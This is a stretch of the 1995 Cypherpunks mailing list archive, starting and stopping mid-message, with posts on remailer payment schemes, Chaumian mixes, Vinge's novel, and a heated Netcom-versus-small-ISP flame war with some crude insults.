It is nothing to do with that confusion.

> To wit, a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.

If they could use blind sigs they would not need a consortium.

The customer would just put the postage inside the envelope,
and each for-pay remailer would just peel off an envelope layer, and
use the postage that the user provided for it.

Chaumian money solves the problems we are discussing.

The problem that we are discussing is how to solve them without
using Chaumian money.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we     James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.         jamesd at netcom.com

From wozzeck at phantom.com Fri Jan 6 19:07:38 1995
From: wozzeck at phantom.com (I'm Wozz)
Date: Fri, 6 Jan 95 19:07:38 PST
Subject: Files and mail
In-Reply-To:
Message-ID:

On Fri, 6 Jan 1995, James A. Donald wrote:
> On Fri, 6 Jan 1995, I'm Wozz wrote:
> > >
> > > Big providers like Netcom have many employees and many machines.
> > > Things do not screech to a halt when "the guy who owns the
> > > machine" takes a mental health day.
> > > :)
> > >
> >
> > no instead things screech to a halt when the 1000th user gets on each
> > client machine
>
> When Netcom slows down, this is not because the asshole in charge
> is being an asshole.

I'd hardly call taking a day off being an asshole. Is he supposed to
staff the thing 24 hours a day 7 days a week? No...it's a small
operation, that cannot be expected.

>
> He may well be an asshole, but the size of netcom protects
> me from having to discover this.
>

and you like the fact that you have NO idea who's running the place.

> This is good for my mental health.
>
> >
> > I'd love to see a response to this...please!
>
> You are totally full of shit.

and why is this? there is no support for this statement...

>
> Mike Horwath was arrogant and unprofessional.
>

hardly...after the fit this woman threw. CC'ing his private mail and
interactions with her to COMPLETELY unrelated places .... such as
cypherpunks, nicholas negroponte of all people, wired, etc, etc, etc

as i understand the situation, the main contention here is that she was
trying to sell space on her web pages.....on winternet's
machines....without winternet's permission. How would netcom react to
such a situation (oh that's right....you're not allowed to have web
pages)

How about a similar situation, such as you selling the time you don't
use on your account to a friend and pocketing the money

> The problems you describe with Netcom's service are entirely
> accurate. I am looking for a better solution. Submitting to
> the authority of an arrogant and incompetent fool does not
> seem like a good solution.
>

no...instead, submit to the authority of 100 or so ANONYMOUS arrogant
incompetent fools

> He is plainly a fool, because if I had acted as he has acted,
> I would certainly not post this all over the place.
>

he's not posting this all over the place....Carol had a fit and he
chose to respond. I'm afraid the baby here is Carol

, + . /\_-\ ==================----------------------
. ` .
<((_))> ==============--------------------
` x . \- \/ ===========------------------
, /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator
. . <((_)) MindVox ((_))> phantom access technologies inc
. \- \/(:::::::::)\- \/ wozzeck at phantom.com
+ ` /\_-\ ===========------------------
. , * ' <((_))> ==============--------------------
+ x \- \/ ==================----------------------

From weidai at eskimo.com Fri Jan 6 19:12:01 1995
From: weidai at eskimo.com (Wei Dai)
Date: Fri, 6 Jan 95 19:12:01 PST
Subject: A Fire Upon the Deep
Message-ID:

In article <199501052231.OAA11745 at netcom5.netcom.com>,
tcmay at netcom.com (Timothy C. May) says:
>Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some
>casual mentions of crypto, including the odd speculation that those in
>the know in the distant future don't really trust public key crypto.

This is quite sensible given that in the Zone universe, you may have
no idea how much computing power your enemies have, so no cryptography
that is only computationally secure can really be trusted.

_A Fire Upon the Deep_ also describes how anarchy might work on a
galactic scale. For example, Vinge seems to think that arbitration
organizations would be very important in such an anarchy and would
acquire military characteristics. Issues of trust and reputation are
also treated implicitly.

There was some recent talk about network agent technology on this list.
Vinge mentions almost in passing how an entire planet (or maybe planets)
was taken over by an "intelligent net packet". Makes me rather nervous
about things like Magic Cap...

One more thing that's marginally related to cypherpunks (hey I really
like this book so I'll take any chance I can to talk about it ;-) is
the idea that the efficiency of distributed computation (and distributed
intelligence) depends on high bandwidth and low latency of the communication
medium.
Since anonymity seems to have rather high costs in terms of
bandwidth and latency (compare anonymous e-mail with internet video
conferencing or even with normal e-mail), this implies that
an organization of anonymous agents will not work as efficiently as
a similar organization whose members are not concerned about
anonymity.

Wei Dai

PGP encrypted mail welcome.

From wozzeck at phantom.com Fri Jan 6 19:20:46 1995
From: wozzeck at phantom.com (I'm Wozz)
Date: Fri, 6 Jan 95 19:20:46 PST
Subject: Files and mail
In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com>
Message-ID:

On Fri, 6 Jan 1995, Mike Duvos wrote:
> "I'm Wozz" writes:
>
> [miscellaneous Netcom-honking elided]
>
> > It just so happens the AUP of winternet allows for this
> > situation.
>
> Right. And a small service provider can make any "terms of
> service agreement" his or her little heart desires. Just like
> the owner of a two line BBS. With big service providers, such
> things tend to be done in a somewhat more business-like fashion.

hahah....netcom can make up anything they want to. You do of course,
read these agreements before you get on...don't you...

Here's a simple solution...don't get on a system whose AUP you
disagree with. Your assertion that simply because a company is not
netcom's size, that it's unprofessional and incompetent is ridiculous.

>
> > it's a bit far fetched to call HIS reaction a tantrum.... If
> > anyone's screaming for mommy it's whats-her-name....
>
> Well, if I posted a message to 10 newsgroups and some bozo posted
> a message to a.c-e.n-a falsely implying that it was the beginning
> of some sort of massive spam, I would certainly not be pleased.
> If Netcom, after receiving some small amount of flamage on the
> subject, summarily removed access to my account and made
> themselves unavailable for several days when I tried to contact
> them to discuss the matter, and then tossed me off with a
> flippant "so sue me" when I protested, I would be even less
> pleased.
> Fortunately, I can't imagine Netcom even caring about a
> 10 newsgroup cross-post.
>

right....because Netcom is FILLED with assholes....those that
crosspost to 10 groups are overlooked

> > big is better i guess....
>
> In the case of Internet Service Providers, big is definitely
> better. There are simply economies of scale which are not
> realized with smaller operations. Netcom has had some problems,
> but almost all of them were growth related. None of them were
> intrinsic to the systems and network itself.
>

so...AOL is better than netcom? at least they have an irc server.

and ALL of netcom's problems are related to the systems and network....
they didn't plan their expansion correctly....and as a result...are
feeling it now.

> > Winternet is HARDLY a 'bbs'. It's a regional internet
> > service....much as netcom was before they flooded every
> > city with dialups.
>
> Read again, this time for comprehension. I did not say Winternet
> was a BBS. Merely that smaller ISPs have many of the undesirable
> characteristics found in BBS systems.
>

and Netcom has many of the undesirable characteristics found in big
systems like Prodigy and Compuserve... if you honestly find this
attractive.....well, enjoy

> > Any professional knows better than to read private
> > mail...and if this is so...then they aren't worthy of having
> > a site to run
>
> For legal purposes, most BBS systems declare that for the
> purposes of the ECPA, there is no such thing as private mail on
> their system. The Sysop is then free to read anything he wishes
> to. This policy is clearly stated in the user agreements of
> almost all BBS systems offering access to the public.
>

well of course.....Netcom will read your mail too if you are accused of
hacking. The fact is....the chances of someone reading your mail on
Netcom are about 100 times higher than on a smaller system....simply
because the place is so overridden with root wielding hackers who have
nothing better to do than torment others....

> > as for PGP, this is an individual thing....I'm sure mike
> > has no such objections...i know here at MindVox we
> > don't...in fact, we installed it for the users
>
> Many BBS Sysops forbid PGP and kick users off their systems who
> use it. They cite fears of encrypted illegal porn and credit
> card numbers passing through their systems, and potential legal
> liability.
>

well......once again.....shop before you buy. You can't make such
blanket assertions, because they simply aren't true.

> > Netcom is an abomination.....it is the only one of its kind
> > (not counting delphi etc, since they were conceived under
> > different systems)
>
> Netcom is the fastest growing and leading Internet Service
> Provider. Their ability to attract new customers is limited only
> by the rate at which they are able to increase capacity. Their
> respect for freedom of expression is absolute and they do not
> meddle in their customers' affairs. Their prices are reasonable
> and their user agreement is fair. Works for me. :)
>

Netcom is also the LEADING source of trouble for the rest of the
network because of the way they handle their user population. They
can't keep up with all their problems. This seems to translate to you
as - "They respect me and don't bother me" The fact is....they don't
even know who the hell you are.

And....being a matter of scale, as several pointed out... netcom is
about 100 times the size of winternet....(approximation)...
thus...let's multiply everything by 100, profits, users, problems, etc,
etc

If one of their users posted (10x100) 1000 MAKE.MONEY.FAST posts to
1000 different groups.....you can bet that person wouldn't have their
account the next day.

> > They suck network services off others (irc as one example)
> > and don't take responsibility for the HUGE number of idiots
> > on their service who maliciously hack anything they can
> > reach....its totally without personality...AND....its slower
> > than molasses...the management is out of touch with the
> > users and they are so overloaded with trouble reports, they
> > don't know what to do with them.
>
> Perhaps an exaggerated description of Netcom a few months ago,
> but certainly not the current state of affairs. I always get a
> line when I dial in, response time is reasonable, disk is
> abundant, and almost all software is available. Speed of network
> connections to other sites is quite acceptable.
>

this is THEIR network..... there is ANOTHER network out there....it's
called...the Internet. I've had MANY users at my site connecting from
netcom, and insisting that our T1 is overloaded because of the chunky
responses they are getting... well, guess what. As soon as they tried
from somewhere else....their problems disappeared.

They contribute very little to the Internet .... and that which they do
is overshadowed by the harm many of their more immature users cause

>
> > oh...btw...i don't have ANY connection to winternet, other
> > than knowing MANY satisfied customers, and having heard
> > a lot about them, as a sysadmin for a site in much the same
> > situation.
>
> The number of satisfied customers is not the measure of a site,
> any more than the number of people still alive is the measure of
> a disease.

it's not? then your opinion doesn't count...right? i mean...you're just
a satisfied user

>
> Netcom works with the reliability of the phone company. It is
> always there, almost always up, and is redundant enough that when
> something breaks, it is still usable. I pay my $19.50 a month
> and I get unlimited everything. I'm happy.
>

If you call netcom usable...you've obviously NEVER tried another
ISP...or had several VERY bad experiences with the few you've tried. I
urge you to give the whole situation another look.

, + . /\_-\ ==================----------------------
. ` . <((_))> ==============--------------------
` x . \- \/ ===========------------------
, /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator
. . <((_)) MindVox ((_))> phantom access technologies inc
. \- \/(:::::::::)\- \/ wozzeck at phantom.com
+ ` /\_-\ ===========------------------
. , * ' <((_))> ==============--------------------
+ x \- \/ ==================----------------------

From wozzeck at phantom.com Fri Jan 6 19:22:52 1995
From: wozzeck at phantom.com (I'm Wozz)
Date: Fri, 6 Jan 95 19:22:52 PST
Subject: Netcom
Message-ID:

Oh yes....and how can we forget... for all its superiority....it seems
to have dropped SLIP/PPP because that made them have to deal with the
customers too much. Makes you feel all loved eh?

, + . /\_-\ ==================----------------------
. ` . <((_))> ==============--------------------
` x . \- \/ ===========------------------
, /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator
. . <((_)) MindVox ((_))> phantom access technologies inc
. \- \/(:::::::::)\- \/ wozzeck at phantom.com
+ ` /\_-\ ===========------------------
. , * ' <((_))> ==============--------------------
+ x \- \/ ==================----------------------

From nesta at nesta.pr.mcs.net Fri Jan 6 19:32:02 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Fri, 6 Jan 95 19:32:02 PST
Subject: A Fire Upon the Deep
In-Reply-To:
Message-ID:

On Fri, 6 Jan 1995, Wei Dai wrote:
> In article <199501052231.OAA11745 at netcom5.netcom.com>, tcmay at netcom.com
>
> There was some recent talk about network agent technology on this list.
> Vinge mentions almost in passing how an entire planet (or maybe planets)
> was taken over by an "intelligent net packet".
> Makes me rather nervous
> about things like Magic Cap...
>

does anyone have any information about intelligent agents? I mean I
know about filter and stuff, but they aren't intelligent agents. I
assume one would be something like the WWW worm and other searching
scripts that have a database of information to cross-reference their
finds and decide what to send back to you. the WWWWorm is a good
centralized illustration of this, with a searchable index of HTML
pages. Or is there something else that makes up a "intelligent agent"

> One more thing that's marginally related to cypherpunks (hey I really
> like this book so I'll take any chance I can to talk about it ;-) is
> the idea that the efficiency of distributed computation (and distributed
> intelligence) depends on high bandwidth and low latency of the communication
> medium. Since anonymity seems to have rather high costs in terms of
> bandwidth and latency (compare anonymous e-mail with internet video
> conferencing or even with normal e-mail), this implies that
> an organization of anonymous agents will not work as efficiently as
> a similar organization whose members are not concerned about
> anonymity.

i disagree strongly. anonymity with almost no increase in latency or
decrease in bandwidth is easily viable. Especially if it was a group
of colleagues planning to get together, I mean the remailers and stuff
are a different thing altogether, but ytalk or another conferencing
system with untraceable features is no problem, hell just a conference
call dialing up from payphones, or a favorite hacker trick of running a
conference of a COCOT. etc....

i want to know everything http://www.mcs.com/~nesta/home.html
i want to be everywhere Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters /-/ a s t e zine

From nelson at crynwr.com Fri Jan 6 20:03:52 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Fri, 6 Jan 95 20:03:52 PST
Subject: Can someone verify this conjecture for me?
Message-ID:

I'd like to make sure I understand how a digital mix works. I've read
Chaum's paper on it, but hey, there's a reason why I don't have a Phd
in spite of having all the coursework done.

It seems like it solves two separate problems: 1) foiling traffic
analysis, and 2) foiling a cheater remailer. The problems are
separate, really, because if you really, really trust the remailer (as
many people do Julf), then 2) isn't a problem. All you need to do is
solve 1. Or, you can solve 1) by using a single remailer. A
necessary but not sufficient step to foil traffic analysis is to strip
headers.

If you trust any one remailer, then you needn't bother using any other
ones (assuming that remailer has enough traffic, delay, mixing, etc to
foil traffic analysis). There's no real difference between using a
set (N>1) of trusted remailers and using only one, because you can
consider the set of remailers to be a single remailer from the point
of view of traffic analysis.

But to be sure, at least one of your remailers MUST attempt to foil
traffic analysis, otherwise you're effectively mistrusting the
remailer operators but trusting the NSA (or FBI). As I said a month
or two ago, you MUST assume that the spooks are watching all the
remailers. It's cheap and easy, therefore it's being done.

Sorry for the Crypto 101, but I figure that there are other people out
there who don't understand it.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From pcassidy at world.std.com Fri Jan 6 20:11:53 1995
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Fri, 6 Jan 95 20:11:53 PST
Subject: Peter D. Lewis
In-Reply-To: <199501070053.TAA00768@bb.hks.net>
Message-ID:

wired has balls. the economist has to figure out what all this stuff
means in the real world.
wired just sells ads around the events it
covers. lewis is innocent compared to wanton scum like kelly.

From jrochkin at cs.oberlin.edu Fri Jan 6 20:13:43 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 20:13:43 PST
Subject: Carol Anne Whoever
Message-ID:

I don't care very much about Carol Anne whoever. I don't care very
much about her plight. I have received just enough information about
her plight (via this list, oddly enough), to know that I don't have
enough information to tell who I agree with in this dispute. I don't
particularly want to get enough information to do that, because I
don't care. If I did care, I would get the information through some
other method than this list, because it seems completely
inappropriate. The merits of netcom vs. smaller services seem
irrelevant to this list, too, in my mind, and I don't care to see
those either. If you were wondering.

I also don't care to see 10 or 20 posts a day by Carol Anne Whoever
which are responses to random crypto-related posts wherein the whole
post is quoted, and then Carol Anne adds "me too!", or "Does that
remind you of a certain sysadmin? giggle, giggle.", or "Good point!"
I am at a loss as to why Carol Anne thinks the details of her life,
and her inane "me too"s are of interest to the cypherpunks list.

I guess we can't stop Carol Anne from sending this stuff to the list
anyways (but I can killfile her), but it would be nice if people would
stop responding to her stuff. Obviously if you really feel it's an
appropriate use of the list to do so anyway, I can't stop you. I'm
just asking you to for purely selfish reasons, so I don't feel the
need to killfile people who make otherwise intelligent posts, and miss
those posts.

[I'm beginning to suspect that Carol Anne, and her sysadmin too, are
just tentacles of Detweiler.]

From schirado at lab.cc.wmich.edu Fri Jan 6 20:26:33 1995
From: schirado at lab.cc.wmich.edu (No Taxes through No Government)
Date: Fri, 6 Jan 95 20:26:33 PST
Subject: Outlawing Anonymity
Message-ID: <199501070427.XAA02486@grog.lab.cc.wmich.edu>

TC May writes:

>I see no prospect whatsoever that a ban on anonymous mail could be
>implemented, enforced, or upheld in the courts.

Never say never.

Even coming from Tim, this surprises me just a little. Never think
that government won't do something. The effectiveness of their
'solution' may be minimal, but billions can be wasted, and countless
lives ruined, before it can be stopped (or more likely, dammed; once
government achieves power, it is loath to relinquish it without a
death struggle).

Some nation's groups of 'leader'-thugs may be in a better position
than others to go for such a power grab at this moment in time. But
any and all of them should be constantly scrutinized for the
inevitable slide down that slippery slope.

The "article" by our pal Martha which the SF Chronicle had the poor
judgment and atrociously swollen cojones to publish, is one of the
most dramatically explicit warning signs of the year so far... and NOT
because the year is yet so young.

And to think, Tim used to be the pessimist on this list, saved only by
the reassurances of Duncan and Sandy... :-S

From blane at seanet.com Fri Jan 6 20:26:55 1995
From: blane at seanet.com (Brian Lane)
Date: Fri, 6 Jan 95 20:26:55 PST
Subject: Too Much!
Message-ID:

Yet again I have un-subbed from the list because of the S/N ratio. And
things were looking so good there for a while.

Advice to Carol Ann: Take your crusade to e-mail.

Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."
| finger blane at seanet.com
-- Journey | PGP 2.6 email accepted
------------------------------------------------------------------------------

From eric at remailer.net Fri Jan 6 20:28:32 1995
From: eric at remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:28:32 PST
Subject: for-pay remailers and FV
In-Reply-To:
Message-ID: <199501070428.UAA21189@largo.remailer.net>

   From: "James A. Donald"

   On Fri, 6 Jan 1995, Eric Hughes wrote:
   > This whole fracas between blind-sig money and FV money is a symptom of
   > the confusion between clearing and settlement.

   It is nothing to do with that confusion.

Keep your day job.

   > To wit, a remailer consortium would do best to issue a local banknote
   > usable only by themselves and have customers settle with the
   > consortium issuer, rather than any member of the consortium itself.
   > If the consortium issuer were to use blind sigs, the consortium
   > members wouldn't be able to ascertain who paid.

Get it? The first sentence refers to a "local banknote". The second
sentence refers to a particular way of issuing that banknote. Passage
from the general to the specific.

   The problem that we are discussing is how to solve them without
   using Chaumian money.

Think about how a local clearing organization allows this.

Eric

From hfinney at shell.portal.com Fri Jan 6 20:32:28 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 6 Jan 95 20:32:28 PST
Subject: Can someone verify this conjecture for me?
Message-ID: <199501070433.UAA16429@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

From: nelson at crynwr.com (Russell Nelson)
>
> I'd like to make sure I understand how a digital mix works. I've read
> Chaum's paper on it, but hey, there's a reason why I don't have a Phd
> in spite of having all the coursework done.
>
> It seems like it solves two separate problems: 1) foiling traffic
> analysis, and 2) foiling a cheater remailer.
> The problems are
> separate, really, because if you really, really trust the remailer (as
> many people do Julf), then 2) isn't a problem. All you need to do is
> solve 1. Or, you can solve 1) by using a single remailer. A
> necessary but not sufficient step to foil traffic analysis is to strip
> headers.

My take on the paper is that he first presents the "mix", or remailer, as
a method of foiling traffic analysis. Then he extends this to the
"cascade", or chain of remailers, which does not improve traffic analysis
resistance but as you say provides some immunity against a bad operator.

> If you trust any one remailer, then you needn't bother using any other
> ones (assuming that remailer has enough traffic, delay, mixing, etc to
> foil traffic analysis). There's no real difference between using a
> set (N>1) of trusted remailers and using only one, because you can
> consider the set of remailers to be a single remailer from the point
> of view of traffic analysis.

There are other differences which may be relevant in practice. One is
bandwidth. With a Chaumian cascade of N remailers you get N times the
bandwidth used, as well as increased latency through the remailer
network.

One thing that is not often appreciated in Chaum's paper is that at least
in his first description of the cascade, the assumption is that all users
use the same sequence of remailers in the same order. We OTOH usually
assume a different model, where the different possible paths are chosen
with some distribution and randomness. I posted an analysis of some of
the impacts of this difference a few months ago.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw4ZXhnMLJtOy9MBAQGjtwIA7tlEMnKPqUAVqAMSmK6EE6eaOlzhqeLL
hsHXhNJajyZQjF6osybGSYJ00UBhRkbAxUOtjY4MNf6oMrb9fKRxGg==
=A3oZ
-----END PGP SIGNATURE-----

From eric at remailer.net Fri Jan 6 20:33:00 1995
From: eric at remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:33:00 PST
Subject: A Fire Upon the Deep
In-Reply-To:
Message-ID: <199501070432.UAA21211@largo.remailer.net>

   From: Wei Dai

   This is quite sensible given that in the Zone universe, you may have
   no idea how much computing power your enemies have, so no cryptography
   that is only computationally secure can really be trusted.

I asked Vernor about this one a few months ago. He got lucky on this
one. He thought that some advances in theory might render the whole
idea ridiculous. It was not the case that he was considering relative
computational power, which works much better in context, especially
given the hints of some computational power beyond Turing machines.

A great one-liner about debating public-key, in any case.

Eric

From nesta at nesta.pr.mcs.net Fri Jan 6 20:38:48 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Fri, 6 Jan 95 20:38:48 PST
Subject: procnail
Message-ID:

in response to the recent barrage of nonsensical bullshit here, I was
wondering if anyone knew the archive site for procmail, the mail
filtering program? I think this is a good time to school everyone in
the basics of Killfiles. I have never wanted to killfile a person
before, this is a big step for me. 8)

i want to know everything http://www.mcs.com/~nesta/home.html
i want to be everywhere Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters /-/ a s t e zine

From root at einstein.ssz.com Fri Jan 6 20:41:56 1995
From: root at einstein.ssz.com (root)
Date: Fri, 6 Jan 95 20:41:56 PST
Subject: Remailers, Linux, & Help ...
Message-ID: <199501070337.VAA00697@einstein.ssz.com>

Hi all,

Normally I use(d) 'ravage at bga.com' to access this list but the times
they are a changin' ...

I have successfully gotten my network at home on Internet via an ISDN
link. We are interested in setting up a remailer which among other
things supports anonymity. If anybody has experience or learned input
on doing this under Linux please contact me.

A reminder that RoboFest 6 in Austin, TX will occur this year on
April 1 & 2. If there are any c-punks interested in giving a talk or
doing demos then please contact me. If any of you folks are in the
area then stop by and say Hi. I will be working at the Wired Society
booth.

Take care!

From nissim at acs.bu.edu Fri Jan 6 20:48:25 1995
From: nissim at acs.bu.edu (nissim at acs.bu.edu)
Date: Fri, 6 Jan 95 20:48:25 PST
Subject: Peter D. Lewis
Message-ID: <199501070438.XAA101470@acs.bu.edu>

I'm unfamiliar with what it is people have against Kevin Kelly. Why
"wanton scum"? people might want to send mail not cc:ed to
cypherpunks to keep the list from experiencing too much of a burden
here.

-A

From tcmay at netcom.com Fri Jan 6 20:48:40 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 6 Jan 95 20:48:40 PST
Subject: Peter D. Lewis
In-Reply-To:
Message-ID: <199501070448.UAA05731@netcom5.netcom.com>

Peter F Cassidy wrote:
>
> wired has balls. the economist has to figure out what all this stuff
> means in the real world. wired just sells ads around the events it
> covers. lewis is innocent compared to wanton scum like kelly.

Maybe I'm biased, but I have a lot of respect for Kevin Kelly. I met
him at the first "Artificial Life" conference, at Los Alamos, 1987,
and he drove down here to Santa Cruz to interview me for several hours
for his not-yet-published "Wired."

(As it turned out, Steven Levy also interviewed some of us and Kelly
chose to run Levy's article in the #2 issue of "Wired," instead of
his own, and submitted his own article to "Whole Earth Review," where
it ran in the Summer 1993 issue.)

I've found Kelly to be somewhat quiet, and deep, and not all
flamboyant and grubbing after soundbite quotes. His book "Out of
Control," 1994, is the best summary I've seen of the swirl of concepts
we are generally interested in.

So, what's your problem with Kelly? If it's the profit motive of
"Wired," we disagree, as I think profits are great. If it's the
ad-laden pages of "Wired," well, that's life in the high-tech age of
cheap color printing, zillions of Macintoshes, and a culture that
loves high-tech glitz.

I think Kelly is a person of high integrity. It's hard to demand much
more than this.

--Tim May

--
..........................................................................
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
408-688-5409 | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tc/tcmay

From eric at remailer.net Fri Jan 6 20:50:56 1995
From: eric at remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:50:56 PST
Subject: procnail
In-Reply-To:
Message-ID: <199501070450.UAA21282@largo.remailer.net>

ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail

Eric

From grendel at netaxs.com Fri Jan 6 21:13:17 1995
From: grendel at netaxs.com (Michael Handler)
Date: Fri, 6 Jan 95 21:13:17 PST
Subject: Netcom is not a good example (Was: Re: Files and mail)
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID:

On Fri, 6 Jan 1995, Mike Duvos wrote:

[ big monolithic service providers like Nyetcom are the best and will
crush all you piddly little upstart ISPs ]

> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted. Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort. Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.

Yeah. They only kill accounts when people criticize NetCruiser. :-P

Nyetcom is hardly an example of a quality service provider. They
suffer periodic long term news and email delays; their service
personnel are rude, slow, and unprofessional (read: Bruce Woodcock &
the above incident); their security has been compromised countless
times; their FTP server is constantly overloaded; their toy software
NetCruiser generates nonconformant Usenet articles; their 18 (!)
machines are constantly overloaded that it takes a good five minutes
to respond to a finger request; they have no http:// support. They
are home to some of the most infamous net.kooks and net.cretins (like
Tom Servo, currently), and their net.reputation sucks. Frankly, I'd
rather have a Winternet account than a Netcom account.

ObCypherpunks: sameer's system, the Community Connexion, suffers
*none* of these problems.
http://www.c2.org or for more information. sameer supports PGP and the running of anonymous remailers on his system. Check it out, send him money. From cactus at hks.net Fri Jan 6 21:52:52 1995 From: cactus at hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 21:52:52 PST Subject: Peter D. Lewis Message-ID: <199501070558.AAA04212@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Tim sez: > I think Kelly is a person of high integrity. It's hard to demand much > more than this. I simply can't think much of a magazine that has cover stories deriving entirely from kiddie-kracker squabbles. Kelly may have plenty of integrity but that's not the word that the magazine "Wired" usually brings to mind. It's not the profit motive or the ads that get me: running a business, I know you can't be picky about who you take money from. It's the lack of meaningful content that annoys me. As with Lewis, frequently when they're discussing something I know something about their stories are fraught with inaccuracies and rumours. My personal favorite is when they list reporters among the "experts" on their technology-watch light bites. Their entire approach is to cast Like "Seventeen," "Wired" should prepend "don't you wish you were" to its title. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4tbioZzwIn1bdtAQEM7gF9EZE2qciEPOqQTYjwiqDF9vakwzSS3DSh ZJy1S0gTP7kNSTDnm/8UuoVOxehFhJ+X =g0sd -----END PGP SIGNATURE----- From doumakes at netcom.com Fri Jan 6 21:55:59 1995 From: doumakes at netcom.com (Don Doumakes) Date: Fri, 6 Jan 95 21:55:59 PST Subject: Remailer Abuse Message-ID: <199501070554.VAA14679@netcom9.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- > One thing to keep in mind, though, is that it's really the _last_ remailer > in the chain that's taking the most heat, and it would be nice if they got > paid. There's also an issue of some remailers refusing to be last in the > chain, so they don't expose themselves so much. I agree, this is an important issue. But I think it's a separate one from the question of how users pay for the service. In other words, once there's a consensus to have a Guild of for-pay remailers, all the users should have to do is pay the Guild once. The Guild can then haggle over how to divvy up the money. Hard jobs, such as posting anon news, should command more money. On the issue of the medium of exchange, I favor blinded digital cash with its absolute anonymity. The "remailer in a box" that we spoke of earlier would do well to include this capability. - -- ______________________________________________________________________ Don Doumakes Finger doumakes at netcom.com for PGP public key Foxpro databases built to your specifications. Email me for details. 
-----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLw3RTBtumcu2AjihAQF+DQQAmhQxuMl4C6VzZLD+mHF5i0OAjLUZAhV+ eNOi4F6bUBsDyfm7TmxxWMsiJRlJFrKhIMT+A16lmBZPdQ/pnZjQSk2keLyXgs0N phsPmZsTWGZMOyWGH+Hh2ggBc5syhmZxuTWwHFqqbAKTVoYRC4esxW8g/lTKot7F drI0amkbq20= =pHqY -----END PGP SIGNATURE----- From mpd at netcom.com Fri Jan 6 21:57:33 1995 From: mpd at netcom.com (Mike Duvos) Date: Fri, 6 Jan 95 21:57:33 PST Subject: Netcom is not a good example (Was: Re: Files and mail) In-Reply-To: Message-ID: <199501070557.VAA12227@netcom18.netcom.com> Michael Handler writes: > Yeah. They only kill accounts when people criticize > NetCruiser. :-P > Netcom is hardly an example of a quality service provider. > They suffer periodic long term news and email delays; their > service personnel are rude, slow, and unprofessional (read: > Bruce Woodcock & the above incident); NetCruiser is a "work in progress" and continues to evolve in the right direction. Bruce Sterling Woodcock is history. On the rare occasions when I have interacted with support at netcom.com, their responses have been both helpful and provided in a timely fashion. > Their security has been compromised countless times This is Unix. Not a problem exclusive to Netcom. > They are home to some of the most infamous net.kooks and > net.cretins (like Tom Servo, currently), ... I suppose I should be pleased that you have not included me by name in the list. :) > Frankly, I'd rather have a Winternet account than a Netcom > account. Fine with me. As long as *I* don't have to have a Winternet account. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From cactus at seabsd.hks.net Fri Jan 6 22:02:08 1995 From: cactus at seabsd.hks.net (L. 
